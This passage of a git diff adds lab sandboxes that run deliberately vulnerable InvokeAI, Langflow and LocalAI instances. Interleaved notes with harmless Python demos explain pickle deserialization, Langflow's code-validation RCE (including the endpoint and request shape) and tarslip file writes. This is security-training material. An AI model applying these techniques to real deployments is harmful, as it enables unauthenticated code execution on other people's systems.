+		isort $(shell find . -name "*.py") 2>/dev/null && echo " [+] isort done" || echo " [-] isort failed or no .py files found"; \
+	else \
+		echo " [-] isort not found. Install with: pip install isort"; \
+	fi
+	@echo "[+] Formatting complete!"
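The picklescan 0.0.14 pin in the Containerfile above is the crux of this lab. As a hedged aside (harmless stand-in payload, not the lab's actual exploit), the reason an unscanned `.ckpt` is dangerous is that pickle deserialization executes any callable supplied via `__reduce__` before the caller ever sees an object:

```python
import pickle

# Why the picklescan pin matters: pickle runs __reduce__-supplied callables
# during deserialization, so loading an untrusted .ckpt executes attacker
# code. Harmless stand-in: the "payload" merely evaluates 1 + 1.
class Payload:
    def __reduce__(self):
        # A real CVE-2024-12029-style payload would invoke os.system here.
        return (eval, ("1 + 1",))

blob = pickle.dumps(Payload())
result = pickle.loads(blob)  # the callable fires before any type checks
assert result == 2
```

picklescan 0.0.14 misses payloads of this shape inside checkpoint archives, which is what makes the pinned sandbox exploitable.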
diff --git a/sandboxes/llm_local_InvokeAI_v5.3.0/README.md b/sandboxes/llm_local_InvokeAI_v5.3.0/README.md new file mode 100644 index 0000000..c73a37b --- /dev/null +++ b/sandboxes/llm_local_InvokeAI_v5.3.0/README.md @@ -0,0 +1,84 @@ +# InvokeAI Sandbox + +This sandbox environment deploys a vulnerable instance of InvokeAI (v5.3.0). It is designed for security researchers to practice exploitation techniques against GenAI image generation platforms, specifically focusing on unauthenticated Remote Code Execution (RCE) via model deserialization. + +--- + + +## Prerequisites + +- Podman (preferred) or Docker +- Make utility + +> **Note:** Ensure port `9090` is not being used by another local service before starting the sandbox. + +--- + +## Setup and Lifecycle + +This lab uses a `Makefile` to simplify container management using Podman. + +### 1. Build and Start the Sandbox + +This will build the image and start the container in detached mode. + +```bash +make all +``` + +### 2. Verify the Environment + +Check if the service is running: + +```bash +podman ps +``` + +The InvokeAI UI should be accessible at: + +``` +http://localhost:9090 +``` + +--- + +### 3. Running an Attack + +To trigger the automated attack, navigate to the `exploitation/InvokeAI_v5.3.0` directory. First start a listener: + +```bash +make listen +``` + +Then in a second terminal, serve the payload: + +```bash +make serve +``` + +Then in a third terminal, trigger the exploit: + +```bash +make attack +``` + +--- + +### 4. 
Stop and Cleanup
+
+To stop the container and remove the image:
+
+```bash
+make clean
+```
+
+---
+
+## Directory Structure
+
+```
+sandboxes/llm_local_InvokeAI_v5.3.0/
+├── Containerfile # Podman definition for the vulnerable environment
+├── Makefile # Automation for build/run/stop/clean
+└── README.md # Documentation
+```
diff --git a/sandboxes/llm_local_langflow_v1.0.12/Containerfile b/sandboxes/llm_local_langflow_v1.0.12/Containerfile
new file mode 100644
index 0000000..f7d7d54
--- /dev/null
+++ b/sandboxes/llm_local_langflow_v1.0.12/Containerfile
@@ -0,0 +1,5 @@
+FROM docker.io/langflowai/langflow:1.0.12
+
+EXPOSE 7860
+
+CMD ["langflow", "run", "--host", "0.0.0.0", "--port", "7860"]
diff --git a/sandboxes/llm_local_langflow_v1.0.12/Containerfile-bak b/sandboxes/llm_local_langflow_v1.0.12/Containerfile-bak
new file mode 100644
index 0000000..13820af
--- /dev/null
+++ b/sandboxes/llm_local_langflow_v1.0.12/Containerfile-bak
@@ -0,0 +1,23 @@
+# sandboxes/Langflow-CVE-2024-37014/Containerfile
+FROM python:3.11-slim
+
+# System dependencies
+RUN apt-get update && apt-get install -y \
+    libgl1 \
+    curl \
+    && rm -rf /var/lib/apt/lists/*
+
+WORKDIR /app
+
+# Pinning vulnerable Langflow and its specific dependencies
+RUN pip install --no-cache-dir \
+    langflow==1.0.12 \
+    "setuptools>=45,<81" \
+    "typer==0.9.0" \
+    "click==8.1.7"
+
+# Expose Langflow UI/API port
+EXPOSE 7860
+
+# Podman/Docker entrypoint
+CMD ["langflow", "run", "--host", "0.0.0.0", "--port", "7860"]
diff --git a/sandboxes/llm_local_langflow_v1.0.12/Makefile b/sandboxes/llm_local_langflow_v1.0.12/Makefile
new file mode 100644
index 0000000..9abcfbb
--- /dev/null
+++ b/sandboxes/llm_local_langflow_v1.0.12/Makefile
@@ -0,0 +1,49 @@
+# sandboxes/Langflow-CVE-2024-37014/Makefile
+IMAGE_NAME := langflow
+CONTAINER_NAME := langflow
+PORT := 7860
+
+.PHONY: all build run stop attack clean
+
+all: build run
+
+build:
+	podman build -f Containerfile -t $(IMAGE_NAME) .
+ +run: + podman run -d \ + --name $(CONTAINER_NAME) \ + --network host \ + $(IMAGE_NAME) + @echo "" + @echo " [+] Langflow v1.0.12 running at http://localhost:$(PORT)" + @echo " [+] CVE-2024-37014 (unauthenticated RCE) is exploitable." + @echo "" + +attack: all + +stop: + podman stop $(CONTAINER_NAME) 2>/dev/null || true + podman rm $(CONTAINER_NAME) 2>/dev/null || true + +clean: stop + podman rmi $(IMAGE_NAME) 2>/dev/null || true +format: + @echo "[*] Running black formatter..." + @if command -v uv >/dev/null 2>&1; then \ + uv run black $(shell find . -name "*.py") 2>/dev/null && echo " [+] black done" || echo " [-] black failed or no .py files found"; \ + elif command -v black >/dev/null 2>&1; then \ + black $(shell find . -name "*.py") 2>/dev/null && echo " [+] black done" || echo " [-] black failed or no .py files found"; \ + else \ + echo " [-] black not found. Install with: pip install black"; \ + fi + @echo "[*] Running isort import sorter..." + @if command -v uv >/dev/null 2>&1; then \ + uv run isort $(shell find . -name "*.py") 2>/dev/null && echo " [+] isort done" || echo " [-] isort failed or no .py files found"; \ + elif command -v isort >/dev/null 2>&1; then \ + isort $(shell find . -name "*.py") 2>/dev/null && echo " [+] isort done" || echo " [-] isort failed or no .py files found"; \ + else \ + echo " [-] isort not found. Install with: pip install isort"; \ + fi + @echo "[+] Formatting complete!" + diff --git a/sandboxes/llm_local_langflow_v1.0.12/README.md b/sandboxes/llm_local_langflow_v1.0.12/README.md new file mode 100644 index 0000000..ff0a813 --- /dev/null +++ b/sandboxes/llm_local_langflow_v1.0.12/README.md @@ -0,0 +1,77 @@ +# Langflow Sandbox + +This sandbox environment deploys a vulnerable instance of Langflow (v1.0.12). It is designed for security researchers to practice exploitation techniques against GenAI orchestration frameworks, specifically focusing on unauthenticated Remote Code Execution (RCE). 
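The unauthenticated RCE this sandbox exercises stems from Langflow's code-validation endpoint `exec()`ing submitted source, so decorator expressions run at "validation" time. A minimal sketch follows; the endpoint path comes from the public CVE-2024-37014 advisory, while the payload and URL are illustrative and not this repo's `exploit.py`:

```python
import json
import urllib.request

# Local demonstration that compiling + exec'ing a definition runs
# attacker-chosen calls: the decorator fires as soon as `flow` is defined,
# before the "validated" code is ever invoked.
calls = []
submitted = "@calls.append\ndef flow():\n    pass\n"
exec(compile(submitted, "<submitted>", "exec"), {"calls": calls})
assert len(calls) == 1  # the decorator call already happened

# Shape of the network request (not sent here); Langflow <= 1.0.12 exposes
# this endpoint without authentication per the CVE-2024-37014 advisory.
req = urllib.request.Request(
    "http://localhost:7860/api/v1/validate/code",
    data=json.dumps({"code": submitted}).encode(),
    headers={"Content-Type": "application/json"},
)
```

In the real attack the decorator expression wraps a shell command instead of a harmless list append, which is what `make attack` automates.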
+
+---
+
+
+## Prerequisites
+
+- Podman (preferred) or Docker
+- Make utility
+
+> **Note:** Ensure port `7860` is not being used by a local installation of Langflow before starting the sandbox.
+
+---
+
+## Setup and Lifecycle
+
+This lab uses a `Makefile` to simplify container management using Podman.
+
+### 1. Build and Start the Sandbox
+
+This will build the image and start the container in detached mode.
+
+```bash
+make all
+```
+
+### 2. Verify the Environment
+
+Check if the service is running:
+
+```bash
+podman ps
+```
+
+The Langflow UI should be accessible at:
+
+```
+http://localhost:7860
+```
+
+---
+
+### 3. Running an Attack
+
+To trigger the automated attack, navigate to the `exploitation` directory. First, start a listener:
+
+```bash
+make listen
+```
+
+Then run the automated attack:
+
+```bash
+make attack
+```
+
+---
+
+### 4. Stop and Cleanup
+
+To stop the container and remove the image:
+
+```bash
+make clean
+```
+
+---
+
+## Directory Structure
+
+```
+sandboxes/llm_local_langflow_v1.0.12/
+├── Containerfile # Podman definition for the vulnerable environment
+├── Makefile # Automation for build/run/stop/attack
+└── README.md # Documentation
+```
diff --git a/sandboxes/llm_local_localAI_v2.17.1/Containerfile b/sandboxes/llm_local_localAI_v2.17.1/Containerfile
new file mode 100644
index 0000000..e028c4c
--- /dev/null
+++ b/sandboxes/llm_local_localAI_v2.17.1/Containerfile
@@ -0,0 +1,21 @@
+FROM docker.io/library/ubuntu:22.04
+
+RUN apt-get update && apt-get install -y \
+    ca-certificates \
+    curl \
+    ffmpeg \
+    && rm -rf /var/lib/apt/lists/*
+
+WORKDIR /app
+
+RUN curl -fsSL \
+    https://github.com/mudler/LocalAI/releases/download/v2.17.1/local-ai-Linux-x86_64 \
+    -o local-ai \
+    && chmod +x local-ai
+
+RUN mkdir -p /app/models
+
+EXPOSE 8080
+
+ENTRYPOINT ["/app/local-ai"]
+CMD ["--address", "0.0.0.0:8080", "--models-path", "/app/models"]
diff --git a/sandboxes/llm_local_localAI_v2.17.1/Makefile
b/sandboxes/llm_local_localAI_v2.17.1/Makefile new file mode 100644 index 0000000..ae89069 --- /dev/null +++ b/sandboxes/llm_local_localAI_v2.17.1/Makefile @@ -0,0 +1,53 @@ +IMAGE_NAME := localai +CONTAINER_NAME := localai + +.PHONY: all build run attack stop clean + +## Build the container image +build: + podman build -f Containerfile -t $(IMAGE_NAME) . + +## Start the vulnerable LocalAI instance +run: + podman run -d \ + --name $(CONTAINER_NAME) \ + --network host \ + localhost/$(IMAGE_NAME) + @echo "" + @echo " [+] LocalAI v2.17.1 is running at http://localhost:8080" + @echo " [+] CVE-2024-6868 (tarslip / arbitrary write -> RCE) is exploitable." + @echo "" + +## Build + run (default target) +all: build run + +## Alias used by exploitation scripts to spin up the target +attack: all + +## Stop and remove the running container +stop: + podman stop $(CONTAINER_NAME) 2>/dev/null || true + podman rm $(CONTAINER_NAME) 2>/dev/null || true + +## Stop the container and delete the image +clean: stop + podman rmi $(IMAGE_NAME) 2>/dev/null || true +format: + @echo "[*] Running black formatter..." + @if command -v uv >/dev/null 2>&1; then \ + uv run black $(shell find . -name "*.py") 2>/dev/null && echo " [+] black done" || echo " [-] black failed or no .py files found"; \ + elif command -v black >/dev/null 2>&1; then \ + black $(shell find . -name "*.py") 2>/dev/null && echo " [+] black done" || echo " [-] black failed or no .py files found"; \ + else \ + echo " [-] black not found. Install with: pip install black"; \ + fi + @echo "[*] Running isort import sorter..." + @if command -v uv >/dev/null 2>&1; then \ + uv run isort $(shell find . -name "*.py") 2>/dev/null && echo " [+] isort done" || echo " [-] isort failed or no .py files found"; \ + elif command -v isort >/dev/null 2>&1; then \ + isort $(shell find . -name "*.py") 2>/dev/null && echo " [+] isort done" || echo " [-] isort failed or no .py files found"; \ + else \ + echo " [-] isort not found. 
Install with: pip install isort"; \
+	fi
+	@echo "[+] Formatting complete!"
+
diff --git a/sandboxes/llm_local_localAI_v2.17.1/README.md b/sandboxes/llm_local_localAI_v2.17.1/README.md
new file mode 100644
index 0000000..2e2317f
--- /dev/null
+++ b/sandboxes/llm_local_localAI_v2.17.1/README.md
@@ -0,0 +1,50 @@
+# LocalAI Sandbox
+This sandbox environment deploys a vulnerable instance of LocalAI (v2.17.1). It is designed for security researchers to practice exploitation techniques against self-hosted AI engines, specifically focusing on arbitrary file write leading to Remote Code Execution (RCE) via a tarslip vulnerability.
+
+---
+
+
+## Prerequisites
+- Podman (preferred) or Docker
+- Make utility
+
+> **Note:** Ensure port `8080` is not being used by another local service before starting the sandbox.
+
+---
+
+## Setup and Lifecycle
+This lab uses a `Makefile` to simplify container management using Podman.
+
+### 1. Build and Start the Sandbox
+This will build the image and start the container in detached mode.
+```bash
+make all
+```
+
+### 2. Verify the Environment
+Check if the service is running:
+```bash
+podman ps
+```
+The LocalAI UI should be accessible at:
+```
+http://localhost:8080
+```
+
+---
+
+### 3. Stop and Cleanup
+To stop the container and remove the image:
+```bash
+make clean
+```
+
+---
+
+## Directory Structure
+```
+sandboxes/llm_local_localAI_v2.17.1/
+├── Containerfile # Podman definition for the vulnerable environment
+├── Makefile # Automation for build/run/stop/attack
+└── README.md # Documentation
+```
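The tarslip primitive behind CVE-2024-6868 can be sketched in a few lines. This is an illustrative, self-contained demonstration (the paths and the defensive check are our own, not LocalAI code): an archive member named with `../` components lands outside the extraction directory unless the extractor normalises each member path first.

```python
import io
import os
import tarfile

# Build an in-memory tar containing a path-traversal member. LocalAI v2.17.1
# extracted such members without normalising paths, turning a model download
# into an arbitrary file write.
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    data = b"injected"
    info = tarfile.TarInfo(name="../../outside.txt")  # escapes the target dir
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))
buf.seek(0)

# Defensive check: resolve each member against the destination and reject
# anything that would land outside it.
def is_within(base, target):
    return os.path.realpath(target).startswith(os.path.realpath(base) + os.sep)

dest = "/tmp/extract"  # hypothetical extraction directory
with tarfile.open(fileobj=buf, mode="r") as tar:
    bad = [m.name for m in tar.getmembers()
           if not is_within(dest, os.path.join(dest, m.name))]
assert bad == ["../../outside.txt"]  # the traversal entry is flagged
```

A patched extractor performs exactly this kind of containment check (or uses `tarfile`'s `filter="data"` on Python 3.12+) before writing any member to disk.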